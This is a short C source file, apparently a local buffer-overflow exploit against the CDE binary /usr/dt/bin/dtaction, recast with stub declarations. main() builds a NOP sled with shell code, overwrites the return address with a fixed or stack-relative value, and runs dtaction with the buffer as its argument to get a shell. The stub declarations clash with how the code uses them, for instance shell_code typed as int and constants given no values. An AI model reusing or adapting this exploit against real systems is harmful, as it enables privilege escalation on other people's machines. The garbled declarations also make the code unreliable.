
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUF_SIZE ;
 int EIP_OFFSET ;
 int EIP_VALUE ;
 unsigned int EIP_VALUE_DIF ;
 int FAKE_OFFSET ;
 unsigned int FAKE_VALUE ;
 unsigned int FAKE_VALUE_DIF ;
 int NOP ;
 int execl (char*,char*,int *) ;
 int fflush (int ) ;
 unsigned int get_sp () ;
 int memcpy (char*,int ,int) ;
 int memset (char*,int ,int) ;
 int printf (char*,...) ;
 int scanf (char*,unsigned int*) ;
 int shell_code ;
 int stdout ;
 int strlen (int ) ;
 int valset (char*,unsigned int) ;

main()
{
    char buf[BUF_SIZE];
    unsigned int esp=get_sp(),sw;

    memset(buf,NOP,BUF_SIZE);
    memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,
           strlen(shell_code));

    printf("esp=%x\n",esp);
    printf("0:Default value 1:Calculated value >");
    fflush(stdout);
    scanf("%d",&sw);
    if (sw==0){
        valset(buf+FAKE_OFFSET, FAKE_VALUE);
        valset(buf+EIP_OFFSET , EIP_VALUE);
        printf("Jumping address = %x\n",EIP_VALUE);
    }else{
        valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
        valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
        printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);
    }
    buf[BUF_SIZE-1]=0;

    execl("/usr/dt/bin/dtaction",buf,((void*)0));
}
